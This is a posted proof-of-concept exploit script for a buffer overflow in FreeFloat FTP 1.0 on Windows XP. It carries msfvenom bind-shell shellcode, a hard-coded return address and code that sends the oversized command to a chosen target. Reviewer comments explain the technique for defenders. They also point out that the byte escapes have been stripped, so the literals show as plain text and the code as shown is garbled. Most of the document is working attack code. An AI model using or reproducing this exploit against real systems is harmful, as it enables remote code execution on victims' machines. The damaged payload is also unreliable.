FreeFloat FTP 1.0 Buffer Overflow
Posted on 12 February 2013
#!/usr/bin/env python
# Exploit Title: FreeFloat FTP raw commands buffer overflow
# Date: 10 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.freefloat.com/
# Version: FreeFloat FTP 1.0
# Tested on: Windows XP Pro SP2, English
#
# Description:
# FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and
# execute arbitrary code when a long and invalid raw command is sent to it.
#
# NOTE(review): Python 2 script (print statements, str-based socket I/O).
# As rendered on this page every string literal reads "x41", "x6a", ...
# with no escape characters, i.e. plain ASCII text rather than the byte
# values the surrounding comments describe.  That looks like extraction
# damage; the literals are reproduced exactly as found.
#
# NOTE(review): what this proof of concept demonstrates, from a defender's
# point of view: a single oversized raw command (251 + 4 + 129 + 366 bytes
# per the constants below) overwrites the saved return address with a
# fixed SHELL32.DLL address, so the technique depends on a module loaded at
# a known location (no ASLR) and, presumably, on the stack being executable
# (no DEP) -- both the default on XP SP2.  Observable artefacts are one
# ~750-byte command sent right after the banner and, per the bind-shell
# payload, a new listener on TCP 4444 on the victim.
import socket, struct, sys

# Minimal argument check: two positional arguments, target address and port.
if len(sys.argv) < 3:
    print "usage: %s IP port" % (sys.argv[0])
    sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

# Bind shellcode generated with msfvenom:
# msfvenom -p windows/shell_bind_tcp
# -b "x00x0ax0bx27x36xcexc1x04x14x3ax44xe0x42xa9x0d"
# -e x86/fnstenv_mov
#
# [*] x86/fnstenv_mov succeeded with size 366 (iteration=1)
shellcode = (
    "x6ax56x59xd9xeexd9x74x24xf4x5bx81x73x13xc8" +
    "x4cxabx8cx83xebxfcxe2xf4x34xa4x22x8cxc8x4c" +
    "xcbx05x2dx7dx79xe8x43x1ex9bx07x9ax40x20xde" +
    "xdcxc7xd9xa4xc7xfbxe1xaaxf9xb3x9ax4cx64x70" +
    "xcaxf0xcax60x8bx4dx07x41xaax4bx2axbcxf9xdb" +
    "x43x1exbbx07x8ax70xaax5cx43x0cxd3x09x08x38" +
    "xe1x8dx18x1cx20xc4xd0xc7xf3xacxc9x9fx48xb0" +
    "x81xc7x9fx07xc9x9ax9ax73xf9x8cx07x4dx07x41" +
    "xaax4bxf0xacxdex78xcbx31x53xb7xb5x68xdex6e" +
    "x90xc7xf3xa8xc9x9fxcdx07xc4x07x20xd4xd4x4d" +
    "x78x07xccxc7xaax5cx41x08x8fxa8x93x17xcaxd5" +
    "x92x1dx54x6cx90x13xf1x07xdaxa7x2dxd1xa0x7f" +
    "x99x8cxc8x24xdcxffxfax13xffxe4x84x3bx8dx8b" +
    "x37x99x13x1cxc9x4cxabxa5x0cx18xfbxe4xe1xcc" +
    "xc0x8cx37x99xfbxdcx98x1cxebxdcx88x1cxc3x66" +
    "xc7x93x4bx73x1dxc5x6cxbdx13x1fxc3x8exc8x5d" +
    "xf7x05x2ex26xbbxdax9fx24x69x57xffx2bx54x59" +
    "x9bx1bxc3x3bx21x74x54x73x1dx1fxf8xdbxa0x38" +
    "x47xb7x29xb3x7exdbx41x8bxc3xf9xa6x01xcax73" +
    "x1dx24xc8xe1xacx4cx22x6fx9fx1bxfcxbdx3ex26" +
    "xb9xd5x9exaex56xeax0fx08x8fxb0xc9x4dx26xc8" +
    "xecx5cx6dx8cx8cx18xfbxdax9ex1axedxdax86x1a" +
    "xfdxdfx9ex24xd2x40xf7xcax54x59x41xacxe5xda" +
    "x8exb3x9bxe4xc0xcbxb6xecx37x99x10x7cx7dxee" +
    "xfdxe4x6exd9x16x11x37x99x97x8axb4x46x2bx77" +
    "x28x39xaex37x8fx5fxd9xe3xa2x4cxf8x73x1dx4c" +
    "xabx8c"
)

# EIP overwritten at offset 251
# JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English
# The address is packed little-endian; it is a hard-coded, build-specific
# value (one English XP SP2 SHELL32 image), which is exactly what ASLR
# removes as a stable target.
jmpesp = struct.pack("<I", 0x7CA58265)

# Layout: 251 bytes of filler up to the saved return address, the 4-byte
# return address, a 129-byte NOP-style slide, then the payload.
buf = "x41" * 251 + jmpesp + "x90" * 129 + shellcode

print "[+] exploiting target %s:%d" % (ip, port)
print "[+] try connecting to %s on port 4444" % (ip)

# Single TCP exchange: read the banner, send the whole command in one
# send().  The socket is never closed explicitly; it is released only at
# interpreter exit.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(1024)
s.send(buf + " ")
